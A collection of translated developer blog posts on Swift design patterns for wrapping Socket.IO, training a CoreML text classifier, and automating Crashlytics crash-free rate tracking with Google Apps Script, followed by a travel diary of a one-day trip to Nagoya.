manager.request("request_event_1") { _ in
    //
}
manager.state = .connected
Similarly, this can also be implemented for onEvent.
Extension: You can further apply the Proxy Pattern to treat Buffer functionality as a type of Proxy.
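As a sketch of that extension, the buffering could be pulled out of SIOManager into a proxy that conforms to the same SIOManagerSpec and wraps the real manager. The type below (BufferingSIOManagerProxy and its isConnected flag) is an illustrative assumption, not part of the original project:
import Foundation

final class BufferingSIOManagerProxy: SIOManagerSpec {
    private let wrapped: SIOManagerSpec
    private var isConnected = false
    private var bufferedCommands: [BufferedCommand] = []

    init(wrapping wrapped: SIOManagerSpec) {
        self.wrapped = wrapped
    }

    func connect() {
        wrapped.connect()
        isConnected = true
        // Flush buffered commands in FIFO order once connected.
        bufferedCommands.forEach { $0.execute() }
        bufferedCommands.removeAll()
    }

    func disconnect() {
        isConnected = false
        wrapped.disconnect()
    }

    func onEvent(event: String, callback: @escaping (Data?) -> Void) {
        wrapped.onEvent(event: event, callback: callback)
    }

    func send(_ event: String) {
        guard isConnected else {
            bufferedCommands.append(SendBufferedCommand(event: event, sioManager: wrapped))
            return
        }
        wrapped.send(event)
    }

    func request(_ event: String, callback: @escaping (Data?) -> Void) {
        guard isConnected else {
            bufferedCommands.append(RequestBufferedCommand(event: event, callback: callback, sioManager: wrapped))
            return
        }
        wrapped.request(event, callback: callback)
    }
}
Feature code would then talk to the proxy exactly as it talks to SIOManager, while the buffering concern lives in one place.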
The Connection has multiple states, with an ordered set of states and transitions between them, allowing different operations in each state:
- Created → Connected, or directly to Disconnected
- Connected → Disconnected
- Disconnected → Reconnecting or Released
- Reconnecting → Connected or Disconnected
SIOConnectionStateMachine implements the state machine: currentSIOConnectionState represents the current state, and created, connected, disconnected, reconnecting, released are the possible states of this machine. enterXXXState() throws implements the allowed and disallowed (throws an error) actions when transitioning from the current state to a specific state. SIOConnectionState is the interface abstraction for all operations that states may use.
+
// Code block translated comments only, code remains in English
+
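Since the code block itself was not carried over here, the following is only a minimal sketch of what such a state machine could look like, using the names mentioned above (SIOConnectionState, SIOConnectionStateMachine, currentSIOConnectionState, enterXXXState() throws); the concrete transition rules follow the transition list above and are assumptions rather than the original implementation:
enum SIOConnectionStateMachineError: Error {
    case invalidTransition
}

// Interface abstraction for the transitions a state may allow.
protocol SIOConnectionState {
    func enterConnectedState() throws -> SIOConnectionState
    func enterDisconnectedState() throws -> SIOConnectionState
    func enterReconnectingState() throws -> SIOConnectionState
    func enterReleasedState() throws -> SIOConnectionState
}

// By default every transition is disallowed; each state overrides only what it permits.
extension SIOConnectionState {
    func enterConnectedState() throws -> SIOConnectionState { throw SIOConnectionStateMachineError.invalidTransition }
    func enterDisconnectedState() throws -> SIOConnectionState { throw SIOConnectionStateMachineError.invalidTransition }
    func enterReconnectingState() throws -> SIOConnectionState { throw SIOConnectionStateMachineError.invalidTransition }
    func enterReleasedState() throws -> SIOConnectionState { throw SIOConnectionStateMachineError.invalidTransition }
}

struct CreatedState: SIOConnectionState {
    func enterConnectedState() throws -> SIOConnectionState { ConnectedState() }
    func enterDisconnectedState() throws -> SIOConnectionState { DisconnectedState() }
}

struct ConnectedState: SIOConnectionState {
    func enterDisconnectedState() throws -> SIOConnectionState { DisconnectedState() }
}

struct DisconnectedState: SIOConnectionState {
    func enterReconnectingState() throws -> SIOConnectionState { ReconnectingState() }
    func enterReleasedState() throws -> SIOConnectionState { ReleasedState() }
}

struct ReconnectingState: SIOConnectionState {
    func enterConnectedState() throws -> SIOConnectionState { ConnectedState() }
    func enterDisconnectedState() throws -> SIOConnectionState { DisconnectedState() }
}

struct ReleasedState: SIOConnectionState { } // terminal state, no outgoing transitions

final class SIOConnectionStateMachine {
    private(set) var currentSIOConnectionState: SIOConnectionState = CreatedState()

    func enterConnectedState() throws { currentSIOConnectionState = try currentSIOConnectionState.enterConnectedState() }
    func enterDisconnectedState() throws { currentSIOConnectionState = try currentSIOConnectionState.enterDisconnectedState() }
    func enterReconnectingState() throws { currentSIOConnectionState = try currentSIOConnectionState.enterReconnectingState() }
    func enterReleasedState() throws { currentSIOConnectionState = try currentSIOConnectionState.enterReleasedState() }
}
Usage is then, for example, try stateMachine.enterConnectedState(); an invalid transition such as Released → Connected simply throws.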
Combining scenarios 1 and 2, we now have the ConnectionPool flyweight pool and State Pattern state management. Continuing to extend this toward the background goals, the Feature side should not need to care about the connection mechanism behind a Connection; therefore we created a poller (named ConnectionKeeper) that periodically scans the ConnectionPool for actively held Connections and acts when the following conditions occur:
- The Connection is in use and its state is not Connected: change the state to Reconnecting and attempt to reconnect.
- The Connection is not in use and its state is Connected: change the state to Disconnected.
- The Connection is not in use and its state is Disconnected: change the state to Released and remove it from the ConnectionPool.
if !connection.isOccupied() && connection.state == .connected then
+... connection.disconnect()
+else if !connection.isOccupied() && connection.state == .disconnected then
+... connection.release()
+else if connection.isOccupied() && connection.state == .disconnected then
+... connection.reconnect()
+end
+
By definition, the Chain of Responsibility Pattern does not allow a node to take over the data, process it, and then pass it on to the next node to continue processing: a node either handles it completely or not at all.
If that pass-it-along behavior is what the scenario needs, the Interceptor Pattern is the better fit.
ConnectionKeeperHandler is the abstract node of the chain; the canExecute method is extracted specifically to avoid a node taking over processing and then still calling the next node to continue. handle links the nodes of the chain, and execute contains the actual processing logic. ConnectionKeeperHandlerContext stores the data that will be used, and isOccupied indicates whether the Connection is in use.
enum ConnectionState {
+ case created
+ case connected
+ case disconnected
+ case reconnecting
+ case released
+}
+
+protocol Connection {
+ var connectionState: ConnectionState {get}
+ var url: URL {get}
+ var id: UUID {get}
+
+ init(url: URL)
+
+ func connect()
+ func reconnect()
+ func disconnect()
+
+ func sendEvent(_ event: String)
+ func onEvent(_ event: String) -> AnyPublisher<Data?, Never>
+}
+
+// Socket.IO Implementation
+class SIOConnection: Connection {
+ let connectionState: ConnectionState = .created
+ let url: URL
+ let id: UUID = UUID()
+
+ required init(url: URL) {
+ self.url = url
+ //
+ }
+
+ func connect() {
+ //
+ }
+
+ func disconnect() {
+ //
+ }
+
+ func reconnect() {
+ //
+ }
+
+ func sendEvent(_ event: String) {
+ //
+ }
+
+ func onEvent(_ event: String) -> AnyPublisher<Data?, Never> {
+ //
+ return PassthroughSubject<Data?, Never>().eraseToAnyPublisher()
+ }
+}
+
+//
+
+struct ConnectionKeeperHandlerContext {
+ let connection: Connection
+ let isOccupied: Bool
+}
+
+protocol ConnectionKeeperHandler {
+ var nextHandler: ConnectionKeeperHandler? { get set }
+
+ func handle(context: ConnectionKeeperHandlerContext)
+ func execute(context: ConnectionKeeperHandlerContext)
+ func canExecute(context: ConnectionKeeperHandlerContext) -> Bool
+}
+
+extension ConnectionKeeperHandler {
+ func handle(context: ConnectionKeeperHandlerContext) {
+ if canExecute(context: context) {
+ execute(context: context)
+ } else {
+ nextHandler?.handle(context: context)
+ }
+ }
+}
+
+class DisconnectedConnectionKeeperHandler: ConnectionKeeperHandler {
+ var nextHandler: ConnectionKeeperHandler?
+
+ func execute(context: ConnectionKeeperHandlerContext) {
+ context.connection.disconnect()
+ }
+
+ func canExecute(context: ConnectionKeeperHandlerContext) -> Bool {
+ if context.connection.connectionState == .connected && !context.isOccupied {
+ return true
+ }
+ return false
+ }
+}
+
+class ReconnectConnectionKeeperHandler: ConnectionKeeperHandler {
+ var nextHandler: ConnectionKeeperHandler?
+
+ func execute(context: ConnectionKeeperHandlerContext) {
+ context.connection.reconnect()
+ }
+
+ func canExecute(context: ConnectionKeeperHandlerContext) -> Bool {
+ if context.connection.connectionState == .disconnected && context.isOccupied {
+ return true
+ }
+ return false
+ }
+}
+
+class ReleasedConnectionKeeperHandler: ConnectionKeeperHandler {
+ var nextHandler: ConnectionKeeperHandler?
+
+ func execute(context: ConnectionKeeperHandlerContext) {
+ context.connection.disconnect() // in the full design this is also where the connection would be marked Released and removed from the ConnectionPool
+ }
+
+ func canExecute(context: ConnectionKeeperHandlerContext) -> Bool {
+ if context.connection.connectionState == .disconnected && !context.isOccupied {
+ return true
+ }
+ return false
+ }
+}
+let connection = SIOConnection(url: URL(string: "wss://pinkoi.com")!)
+let disconnectedHandler = DisconnectedConnectionKeeperHandler()
+let reconnectHandler = ReconnectConnectionKeeperHandler()
+let releasedHandler = ReleasedConnectionKeeperHandler()
+disconnectedHandler.nextHandler = reconnectHandler
+reconnectHandler.nextHandler = releasedHandler
+
+disconnectedHandler.handle(context: ConnectionKeeperHandlerContext(connection: connection, isOccupied: false))
+
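To connect these handlers back to the ConnectionKeeper poller described earlier, here is a rough sketch. How it enumerates the pool's held connections (the connections closure and its isOccupied flag) is an assumption for illustration, since the real ConnectionPool interface is not shown in this excerpt:
import Foundation

final class ConnectionKeeper {
    private let chain: ConnectionKeeperHandler
    private var timer: Timer?
    // Assumption: some way to enumerate the pool's connections together with their occupancy.
    private let connections: () -> [(connection: Connection, isOccupied: Bool)]

    init(connections: @escaping () -> [(connection: Connection, isOccupied: Bool)]) {
        self.connections = connections

        // Build the chain once: disconnect -> reconnect -> release.
        let disconnectedHandler = DisconnectedConnectionKeeperHandler()
        let reconnectHandler = ReconnectConnectionKeeperHandler()
        let releasedHandler = ReleasedConnectionKeeperHandler()
        disconnectedHandler.nextHandler = reconnectHandler
        reconnectHandler.nextHandler = releasedHandler
        self.chain = disconnectedHandler
    }

    func start(interval: TimeInterval = 10) {
        timer = Timer.scheduledTimer(withTimeInterval: interval, repeats: true) { [weak self] _ in
            self?.scan()
        }
    }

    func stop() {
        timer?.invalidate()
        timer = nil
    }

    private func scan() {
        // Run every held connection through the chain; at most one handler acts on each.
        for item in connections() {
            chain.handle(context: ConnectionKeeperHandlerContext(connection: item.connection, isOccupied: item.isOccupied))
        }
    }
}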
Before using the Connection we encapsulated, it has to go through setup, such as providing the URL path, setting the config, and so on.
// ❌ wrong usage
+let connection = Connection()
+connection.send(event) // unexpected method call, should call .connect() first
+
+// ✅ expected usage
+let connection = Connection()
+connection.connect()
+connection.send(event)
+// but...who knows???
+
SIOConnectionBuilder is the builder for Connection, responsible for setting and storing the data needed to build a Connection; the ConnectionConfiguration abstract interface ensures that .connect() must be called to obtain the Connection instance before it can be used.
enum ConnectionState {
+ case created
+ case connected
+ case disconnected
+ case reconnecting
+ case released
+}
+
+protocol Connection {
+ var connectionState: ConnectionState {get}
+ var url: URL {get}
+ var id: UUID {get}
+
+ init(url: URL)
+
+ func connect()
+ func reconnect()
+ func disconnect()
+
+ func sendEvent(_ event: String)
+ func onEvent(_ event: String) -> AnyPublisher<Data?, Never>
+}
+
+// Socket.IO Implementation
+class SIOConnection: Connection {
+ let connectionState: ConnectionState = .created
+ let url: URL
+ let id: UUID = UUID()
+
+ required init(url: URL) {
+ self.url = url
+ //
+ }
+
+ func connect() {
+ //
+ }
+
+ func disconnect() {
+ //
+ }
+
+ func reconnect() {
+ //
+ }
+
+ func sendEvent(_ event: String) {
+ //
+ }
+
+ func onEvent(_ event: String) -> AnyPublisher<Data?, Never> {
+ //
+ return PassthroughSubject<Data?, Never>().eraseToAnyPublisher()
+ }
+}
+
+//
+class SIOConnectionClient: ConnectionConfiguration {
+ private let url: URL
+ private let config: [String: Any]
+
+ init(url: URL, config: [String: Any]) {
+ self.url = url
+ self.config = config
+ }
+
+ func connect() -> Connection {
+ // set config
+ return SIOConnection(url: url)
+ }
+}
+
+protocol ConnectionConfiguration {
+ func connect() -> Connection
+}
+
+class SIOConnectionBuilder {
+ private(set) var config: [String: Any] = [:]
+
+ func setConfig(_ config: [String: Any]) -> SIOConnectionBuilder {
+ self.config = config
+ return self
+ }
+
+ // url is required parameter
+ func build(url: URL) -> ConnectionConfiguration {
+ return SIOConnectionClient(url: url, config: self.config)
+ }
+}
+
+let builder = SIOConnectionBuilder().setConfig(["test":123])
+
+
+let connection1 = builder.build(url: URL(string: "wss://pinkoi.com/1")!).connect()
+let connection2 = builder.build(url: URL(string: "wss://pinkoi.com/1")!).connect()
+
Extension: Here you can also apply the Factory Pattern, to produce SIOConnection using a factory.
The above are the four scenarios encountered in encapsulating Socket.IO and the seven Design Patterns used to solve the problems.
Unlike the naming and demonstrations in this article, this image shows the actual design architecture; there may be an opportunity later for the original designer to share the design concepts and open-source the project.
Who designed these and is responsible for the Socket.IO encapsulation project?
Main architect, evaluation and application of Design Patterns, implementation of design in Kotlin on the Android side.
Project lead of the Platform Team, Pair programming, implementation of design in Swift on the iOS side, discussion and raising questions (a.k.a. speaking up), and finally writing this article to share with everyone.
If you have any questions or suggestions, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Explore CoreML 2.0, how to convert or train models and apply them in real products
Following the previous article on researching machine learning on iOS, this article officially delves into using CoreML.
First, a brief history: Apple released CoreML (including Vision introduced in the previous article) machine learning framework in 2017; in 2018, they followed up with CoreML 2.0, which not only improved performance but also supports custom CoreML models.
If you’ve only heard the term “machine learning” but don’t understand what it means, here’s a simple explanation in one sentence:
“Predict the outcome of similar future events based on your past experiences.”
For example: I like to add ketchup to my egg pancake. After buying it a few times, the breakfast shop owner remembers, “Sir, ketchup?” I reply, “Yes” — the owner predicts correctly; if I reply, “No, because it’s radish cake + egg pancake” — the owner remembers and adjusts the question next time.
Input data: egg pancake, cheese egg pancake, egg pancake + radish cake, radish cake, egg
Output data: add ketchup / no ketchup
Model: the owner’s memory and judgment
My understanding of machine learning is also purely theoretical, without in-depth practical knowledge. If there are any mistakes, please correct me.
This is where I must thank Apple for productizing machine learning, making it accessible with just basic concepts and lowering the entry barrier. It was only after implementing this example that I felt a tangible connection to machine learning, sparking a great interest in this field.
The first and most important step is the “model” mentioned earlier. Where do models come from?
There are three ways:
- Use a ready-made model: Awesome-CoreML-Models is a GitHub project that collects many pre-trained models.
- Convert an existing model: for model conversion, refer to the official website or online resources.
- Train your own model, which is what the rest of this article walks through.
For text segmentation, refer to Natural Language Processing in iOS Apps: An Introduction to NSLinguisticTagger
In simple terms, we provide the machine with “text content” and “categories” to train the computer to classify future data. For example: “Click to see the latest offers!”, “Get $1000 shopping credit now” => “Advertisement”; “Alan sent you a message”, “Your account is about to expire” => “Important matters”
Practical applications: spam detection, tag generation, classification prediction
p.s. I haven’t thought of any practical uses for image recognition yet, so I haven’t researched it; interested friends can check this article, the official site provides a convenient GUI training tool for images!!
Required Tools: MacOS Mojave⬆ + Xcode 10
Training Tool: BlankSpace007/TextClassiferPlayground (The official tool only provides GUI training tools for images, for text you need to write your own; this is a third-party tool provided by an expert online)
Data structure as shown above, supports .json, .csv files
Prepare the data to be used for training, here we use Phpmyadmin (Mysql) to export the training data
SELECT `title` AS `text`,`type` AS `label` FROM `posts` WHERE `status` = '1'
+
Change the export format to JSON
[
+ {"type":"header","version":"4.7.5","comment":"Export to JSON plugin for PHPMyAdmin"},
+ {"type":"database","name":"db"},
+ {"type":"table","name":"posts","database":"db","data":
+ // Delete above
+ [
+ {
+ "label":"",
+ "text":""
+ }
+ ]
+ // Delete below
+ }
+]
+
Open the downloaded JSON file and keep only the content within the DATA structure
After downloading the training tool, click TextClassifer.playground to open Playground
Click the red box to execute -> click the green box to switch View display
Drag the JSON file into the GUI tool
Open the Console below to check the training progress, seeing “Test Accuracy” means the model training is complete
If there is too much data, it will test your computer’s processing power.
Fill in the basic information and click “Save”
Save the trained model file
CoreML model file
At this point, your model is already trained! Isn’t it easy?
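For reference, this kind of training playground is presumably built on Apple's Create ML API. A minimal sketch of training the same kind of model directly in a macOS Playground, assuming the data.json prepared earlier with its text/label fields and with illustrative file paths, might look like this:
import CreateML
import Foundation

// Load the training data exported earlier (fields: "text", "label"); adjust the path to your file.
let data = try MLDataTable(contentsOf: URL(fileURLWithPath: "/path/to/data.json"))

// Train the text classifier.
let classifier = try MLTextClassifier(trainingData: data,
                                      textColumn: "text",
                                      labelColumn: "label")

// Training accuracy, similar in spirit to the "Test Accuracy" the tool prints.
print("Training accuracy: \(100 * (1 - classifier.trainingMetrics.classificationError))%")

// Export the .mlmodel to drag into the iOS project.
try classifier.write(to: URL(fileURLWithPath: "/path/to/textClassifier.mlmodel"))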
Specific Training Method:
At this point, most of the work is done. Next, just add the model file to the iOS project and write a few lines of code.
Drag/drop the model file (*.mlmodel) into the project
import CoreML
+
+//
+if #available(iOS 12.0, *), let prediction = try? textClassifier().prediction(text: "Text content to predict") {
+ let type = prediction.label
+ print("I think it is...\(type)")
+}
+
Done!
The above three points, based on the information currently available, are not feasible.
Currently, I am applying it in a practical APP to predict the classification when posting articles.
I used about 100 pieces of training data, and the current prediction accuracy is about 35%, mainly for experimental purposes.
— — — — —
It’s that simple to complete the first machine learning project in your life; there is still a long way to go to learn how the background works. I hope this project can give everyone some inspiration!
References: WWDC2018 Create ML (Part 2)
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Using Google Apps Script to query Crashlytics through Google Analytics and automatically fill it into Google Sheet
In the previous article, “Crashlytics + Big Query to Create a More Real-Time and Convenient Crash Tracking Tool”, we exported Crashlytics crash records as Raw Data to Big Query and used Google Apps Script to automatically schedule queries for the Top 10 Crashes & post messages to the Slack Channel.
This article continues to automate an important metric related to app crashes — Crash-Free Users Rate, the percentage of users not affected by crashes. Many app teams continuously track and record this metric, which was traditionally done manually. The goal here is to automate this repetitive task and avoid potential errors in manual data entry. As mentioned earlier, Firebase Crashlytics does not provide any API for querying, so we need to connect Firebase data to other Google services and then use those service APIs to query the relevant data.
Initially, I thought this data could also be queried from Big Query; however, this approach is entirely wrong because Big Query contains Raw Data of crashes and does not include data of users who did not experience crashes, making it impossible to calculate the Crash-Free Users Rate. There is limited information on this requirement online, and after extensive searching, I found a mention of Google Analytics. I knew that Firebase’s Analytics and Events could be connected to GA for queries, but I did not expect the Crash-Free Users Rate to be included. After reviewing GA’s API, Bingo!
Google Analytics Data API (GA4) provides two crash-related metrics: crashAffectedUsers and crashFreeUsersRate.
Knowing the way forward, we can start implementing it!
You can refer to the official instructions for setup steps, which are omitted here.
Before writing code, we can use the Web GUI Tool provided by the official site to quickly build query conditions and obtain query results. Once the results are as desired, we can start writing code.
Set the query conditions roughly as follows:
- Date range: the start and end dates of the query; relative values such as yesterday, today, 30daysAgo, 7daysAgo are supported.
- Metric: crashFreeUsersRate.
- Dimension: platform (device type iOS/Android/Desktop…).
- Dimension filter: platform, string, exact, with the value iOS or Android.
Query the Crash-Free Users Rate for both platforms separately.
Scroll to the bottom and click “Make Request” to view the results. We can get the Crash-Free Users Rate within the specified date range.
You can go back and open Firebase Crashlytics to compare if the data under the same conditions is the same.
It has been observed that the two sources can differ slightly (we saw a difference of 0.0002 in one number); the reason is unknown, but it is within an acceptable margin of error. As long as you consistently use the GA Crash-Free Users Rate as your source, the discrepancy does not really count as an error.
Next is the automation part. We will use Google Apps Script to query GA Crash-Free Users Rate data and automatically fill it into our Google Sheet, achieving the goal of automatic filling and tracking.
Assume our Google Sheet is as shown above.
You can click Extensions -> Apps Script at the top of Google Sheet to create a Google Apps Script or click here to go to Google Apps Script -> click “New Project” at the top left.
After entering, you can click the unnamed project name at the top to give it a project name.
In the “Services” on the left, click “+” to add “Google Analytics Data API”.
Go back to the GA4 Query Explorer tool, and next to the Make Request button, you can check “Show Request JSON” to get the Request JSON for these conditions.
Convert this Request JSON into Google Apps Script as follows:
// Remember to add Google Analytics Data API to Services, or you'll see this error: ReferenceError: AnalyticsData is not defined
+// https://ga-dev-tools.web.app/ga4/query-explorer/ -> property id
+const propertyId = "";
+// https://docs.google.com/spreadsheets/d/googleSheetID/
+const googleSheetID = "";
+// Google Sheet name
+const googleSheetName = "App Crash-Free Users Rate";
+
+function execute() {
+ Logger.log(fetchCrashFreeUsersRate())
+}
+
+function fetchCrashFreeUsersRate(platform = "ios", startDate = "30daysAgo", endDate = "today") {
+ const dimensionPlatform = AnalyticsData.newDimension();
+ dimensionPlatform.name = "platform";
+
+ const metric = AnalyticsData.newMetric();
+ metric.name = "crashFreeUsersRate";
+
+ const dateRange = AnalyticsData.newDateRange();
+ dateRange.startDate = startDate;
+ dateRange.endDate = endDate;
+
+ const filterExpression = AnalyticsData.newFilterExpression();
+ const filter = AnalyticsData.newFilter();
+ filter.fieldName = "platform";
+ const stringFilter = AnalyticsData.newStringFilter()
+ stringFilter.value = platform;
+ stringFilter.matchType = "EXACT";
+ filter.stringFilter = stringFilter;
+ filterExpression.filter = filter;
+
+ const request = AnalyticsData.newRunReportRequest();
+ request.dimensions = [dimensionPlatform];
+ request.metrics = [metric];
+ request.dateRanges = dateRange;
+ request.dimensionFilter = filterExpression;
+
+ const report = AnalyticsData.Properties.runReport(request, "properties/" + propertyId);
+
+ return parseFloat(report.rows[0].metricValues[0].value) * 100;
+}
+
In the initial Property selection menu, the number below the selected Property is the propertyId.
The googleSheetID is the ID segment of your sheet's URL: https://docs.google.com/spreadsheets/d/googleSheetID/edit.
Paste the above code into the Google Apps Script code block on the right & select the "execute" function from the method dropdown at the top. Then click Debug to test whether the data can be retrieved correctly:
The first time you run it, an authorization request window will appear:
Follow the steps to complete account authorization.
If the execution is successful, the Crash-Free Users Rate will be printed in the Log below, indicating a successful query.
Next, we just need to add automatic filling into Google Sheets to complete the task!
Complete Code:
// Remember to add Google Analytics Data API to Services, or you'll see this error: ReferenceError: AnalyticsData is not defined
+
+// https://ga-dev-tools.web.app/ga4/query-explorer/ -> property id
+const propertyId = "";
+// https://docs.google.com/spreadsheets/d/googleSheetID/
+const googleSheetID = "";
+// Google Sheet name
+const googleSheetName = "";
+
+function execute() {
+ const today = new Date();
+ const daysAgo7 = new Date(new Date().setDate(today.getDate() - 6)); // Today is not counted, so it's -6
+
+ const spreadsheet = SpreadsheetApp.openById(googleSheetID);
+ const sheet = spreadsheet.getSheetByName(googleSheetName);
+
+ var rows = [];
+ rows[0] = Utilities.formatDate(daysAgo7, "GMT+8", "MM/dd")+"~"+Utilities.formatDate(today, "GMT+8", "MM/dd");
+ rows[1] = fetchCrashFreeUsersRate("ios", Utilities.formatDate(daysAgo7, "GMT+8", "yyyy-MM-dd"), Utilities.formatDate(today, "GMT+8", "yyyy-MM-dd"));
+ rows[2] = fetchCrashFreeUsersRate("android", Utilities.formatDate(daysAgo7, "GMT+8", "yyyy-MM-dd"), Utilities.formatDate(today, "GMT+8", "yyyy-MM-dd"));
+ sheet.appendRow(rows);
+}
+
+function fetchCrashFreeUsersRate(platform = "ios", startDate = "30daysAgo", endDate = "today") {
+ const dimensionPlatform = AnalyticsData.newDimension();
+ dimensionPlatform.name = "platform";
+
+ const metric = AnalyticsData.newMetric();
+ metric.name = "crashFreeUsersRate";
+
+ const dateRange = AnalyticsData.newDateRange();
+ dateRange.startDate = startDate;
+ dateRange.endDate = endDate;
+
+ const filterExpression = AnalyticsData.newFilterExpression();
+ const filter = AnalyticsData.newFilter();
+ filter.fieldName = "platform";
+ const stringFilter = AnalyticsData.newStringFilter()
+ stringFilter.value = platform;
+ stringFilter.matchType = "EXACT";
+ filter.stringFilter = stringFilter;
+ filterExpression.filter = filter;
+
+ const request = AnalyticsData.newRunReportRequest();
+ request.dimensions = [dimensionPlatform];
+ request.metrics = [metric];
+ request.dateRanges = dateRange;
+ request.dimensionFilter = filterExpression;
+
+ const report = AnalyticsData.Properties.runReport(request, "properties/" + propertyId);
+
+ return parseFloat(report.rows[0].metricValues[0].value) * 100;
+}
+
Click “Run or Debug” above to execute “execute”.
Go back to Google Sheet, data added successfully!
Select the clock button on the left -> Bottom right “+ Add Trigger”.
Click Save after setting.
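If you would rather create the trigger in code than through this UI, a time-driven trigger can also be set up with Apps Script's ScriptApp service; a small sketch, where the weekday and hour are just example values:
// Run this once to create a weekly time-driven trigger for execute().
function createWeeklyTrigger() {
  ScriptApp.newTrigger("execute")
    .timeBased()
    .everyWeeks(1)
    .onWeekDay(ScriptApp.WeekDay.MONDAY)
    .atHour(9)
    .create();
}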
From now on, recording and tracking App Crash-Free Users Rate data is fully automated; no manual query & input needed; everything is handled automatically by the machine!
We only need to focus on solving App Crash issues!
p.s. Unlike the previous article using Big Query which costs money to query data, querying Crash-Free Users Rate and using Google Apps Script in this article are completely free, so feel free to use them.
If you want to sync the results to a Slack Channel, refer to the previous article:
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Peach Aviation Nagoya One-Day Flash Ticket Travel Experience
A round-trip ticket for a day trip to Nagoya is an activity launched by Peach Aviation:
At that time, I bought a round-trip ticket to Nagoya for $5,600 with the airport service fee included; no checked baggage, no meals, no seat selection, and both flights were red-eye flights:
According to official promotional materials, the longest stay is 16 hours and 45 minutes!
Carry-on baggage regulations: Two pieces per person & total weight less than 7 kilograms
Date: 2023/09/11, Solo trip
To speed up entry, I filled out the entry information in advance and completed the entry procedures directly using a QR code:
Chubu Centrair International Airport Information
A one-day flash is a test of physical and mental endurance; I originally planned to wait at the airport or sleep on the plane, but I wasn’t sleepy because the waiting time at the airport was too early. After boarding the plane, the seat was too small, not by the window, the engine noise was very loud, and I didn’t really fall asleep, so it was like not sleeping all night; I started the Nagoya itinerary at 6:00 after getting off the plane; I was so tired that I slept for over half an hour in a quiet cafe at Nagoya Tower at noon (quiet, not many people).
Time and attractions are limited, so I couldn’t go too far.
In addition to the body’s energy, the phone’s battery is also a big test; I brought a 20,000 mAh Xiaomi power bank to complete the entire itinerary (probably charged the iPhone 13 back and forth 4–5 times).
I returned to Taiwan around 2–3 am, with no public transportation, so I had to take a taxi back to Taipei.
You can pay a few hundred more to choose a window seat, prepare a neck pillow, and earplugs for better sleep.
Arrived too early, the check-in counter opened at 23:55 (although I didn’t have checked baggage, I couldn’t check in online for some reason, so I had to wait for the counter to open).
Still an hour before check-in opened, so I went back to the B1 food street to find a place to rest; all the shops in the food street were closed at 11 PM (including convenience stores), couldn’t find anything to eat.
The check-in counter opened early, I returned to the departure hall at 11:40 and saw that check-in had started; without checked baggage, just carrying a backpack, quickly completed check-in & security check & departure.
Starting from 9/11, officially counting down 24 hours!
It’s worth mentioning that there is a free lounge in Terminal 1, just follow the signs to the VIP lounge; the environment and seats are similar to a cafe, there is even a shower room (open from 6 AM to 10 PM); for more details, refer to this article.
It’s actually better to sleep in the lounge area because you can lie down… But at that time, I just took a quick look and started looking for a place to buy food at the airport (because there was no in-flight meal), but it was late and everything was closed, I only found a vending machine selling cookies, so I bought a pack of Yimei cream puffs and a can of tea.
Arrived really early, not many people in the boarding gate area; the chairs are in pairs, making it difficult to lie down and sleep (very uncomfortable, I got up after taking the photo), sleeping with your head up is also uncomfortable, and the boarding gate area is very cold; but at that time, I was still feeling okay, not sleepy, as time passed, more people arrived, it got noisier, making it even harder to sleep; so I just closed my eyes to rest and conserve energy, reviewed some basic Japanese (hiragana), planning to sleep on the plane later.
The flight was slightly delayed, boarding was supposed to start at 01:55, delayed by 10 minutes; I completed boarding at 02:15.
The seat was very small, no headrest by the aisle, luckily I had a neck pillow for some support, but the noise of the engines and neck discomfort made it almost impossible to sleep, so I endured the bumpy ride all the way to Nagoya; there was no screen displaying the flight distance on the plane, making the time feel very long.
If I had to choose again, I would pay a little extra for a window seat; one, there’s a better place to rest your head, and two, you can see the sunrise from the window when arriving in Japan in the morning!!
Perhaps due to the early morning and no need to pick up luggage, it took less than 15 minutes from landing to immigration; but the weather wasn’t great, it was raining heavily in Nagoya.
One image shows seating information and the other shows entry/exit ticket (for the machine).
KKday Chubu Centrair International Airport NGO ⇆ Nagoya Station Meitetsu Airport Express Train e-Ticket: https://www.kkday.com/zh-tw/product/20418-chubu-centrair-international-airport-express-train-transfer-to-nagoya?cid=19365&ud1=9da2c51fa4f2
I first bought a one-way train ticket from Chubu Centrair International Airport to Nagoya + uSky train ($271) online, thinking since I’m here, might as well experience the newest and best train; assigned seats, very stable and comfortable, and it’s an express train.
However, if you want to save money and convenience, you can actually buy tickets on-site or take a regular train directly to the station; attach the train schedule and stops, or directly search from Meitetsu website:
You need to get off at Kanayama (NH34) and transfer to “Meijo Line” to go to Kamiiida Station.
The store opens at 8:00, but there were no people around early in the morning, and the nearby Osu shopping street was not open yet.
Coffee is a must, especially after staying up all night; the shrimp in the fried shrimp toast is cut into pieces, giving a chewy texture.
Nagoya Castle opens at 9:00, other attractions don’t open that early, and it’s on the way from Kamiiida Station, so I decided to visit Nagoya Castle first.
After having breakfast, I arrived at Nagoya Castle Station around 9:02.
Upon exiting the station, I found it was raining heavily outside, and I didn’t expect rain in Japan, so I didn’t bring an umbrella; there were no convenience stores nearby, but I finally found a FamilyMart in the underground street at Nagoya Castle Station B1, bought an umbrella, and continued to Nagoya Castle.
As I entered Nagoya Castle, the rain eased a bit, but the main keep was under maintenance and not open to visitors, so I only visited the splendid Honmaru Palace next to it.
To enter the Honmaru Palace, you need to take off your shoes and store your bag (free, but you need a ¥100 coin).
Located at the lower right corner of Nagoya Castle, about 2 stops away; I took a bus after leaving Nagoya Castle.
The weather was cloudy with occasional sunshine when I arrived, then it cleared up, and it became cloudy again when I left.
After buying a ticket, you can go up to the observation deck to overlook Nagoya City (if you only want to visit the middle-level café, no ticket is needed, and you can still enjoy some views).
Café view, feeling sleepy around 10:30; slept here until after 11, lots of seats, few people, quiet… perfect for a nap.
Oasis 21 is just outside Nagoya Tower, but not much to see due to rain + weekday + morning, so just took a quick look around and left.
Approaching noon, wanted to try Nagoya’s famous miso pork cutlet, the store is about one or two stops away from Nagoya Tower, decided to walk there.
Arrived to find a long line due to the crowd… time was precious, since near Osu Shopping Street, continued walking there to find food.
Walking towards Osu Kannon, just before Osu Kannon there is another branch of Shichijo, went in for a meal.
Mindlessly ordered a set meal, realized I ordered wrong, mainly wanted to eat the miso pork cutlet in the top left corner, set meal includes miso pork cutlet + fried willow leaf fish + tsukemono + side dish + soup + rice; miso pork cutlet was delicious but not enough!
This store is right next to Osu Kannon.
Main hall under maintenance, just walked around outside and left.
